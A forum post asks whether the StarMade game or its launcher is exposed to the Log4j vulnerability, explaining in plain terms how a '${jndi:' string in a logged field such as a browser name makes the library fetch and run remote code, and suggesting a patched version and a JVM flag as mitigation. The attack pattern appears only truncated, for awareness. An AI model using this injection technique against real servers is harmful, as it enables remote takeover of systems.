Log4j vulnerability in StarMade or the StarMade Launcher current versions and older.

    Joined
    Mar 15, 2019
    Messages
    6
    Reaction score
    5
    Does StarMade, the Launcher or the bundled JaVa both current or older versions have the Log4j vulnerability?


    A few days ago the Log4j vulnerability was found on Minecraft servers.

    A logger is a piece of software that saves data on a computer. It is used to monitor what is happening, determine if the software runs smoothly, or catch information to help debugging when things go wrong.
    It logs a lot of information. When you browse to a website, it will write down what IP address you have, what browser you are using (firefox, chrome, edge... ), when you made the request, what page you accessed... and more!
    So, this log4j library is used in A LOT of Java software, and there is approximately 3 billion devices that runs Java. Quick math: that's huge.
    Log4j is present in web servers, your phones, possibly on your smart fridge and plenty other places...

    A logger is supposed to just write down what happens to a hard drive, or send it to another server to store it. But in the case of log4j, there are a few things that are performed before writing anything.
    One of the things it does is look for patterns like ${something} and will try to replace it with another piece of information.
    It is used to add context, for example ${date} would be replaced by today's date.
    (I have no idea if this example works, it's just to keep it simple)
    So when there's a ${jndi: pattern, it will try to replace it.

    Except that this pattern triggers another mechanism that loads a resource from another computer, anywhere on the internet, we just have to tell it where to get the data from.

    This data can be a malicious software.

    Due to some internal Java mechanism, this malicious software is automatically run on the computer that used log4j.
    Which means that at this point hackers can make the targeted computer do (almost) whatever they want
    This gets really bad because we don't need to know which computer to target.
    Remember when I said the web servers logs what browser you use? Well, we can just tell it that our browser is "${jndi: [...]", and if it uses log4j it will trigger the vulnerability.
    In real life that would be the same as giving the keys to your house to a random stranger you just saw pass in front of you, without even realizing.

    Github page to patched Log4j version.

    A workaround could be to add this JVM-command to the tool -Dlog4j2.formatMsgNoLookups=true

    But I do not know if this would work for StarMade if StarMade was found to be having this issue.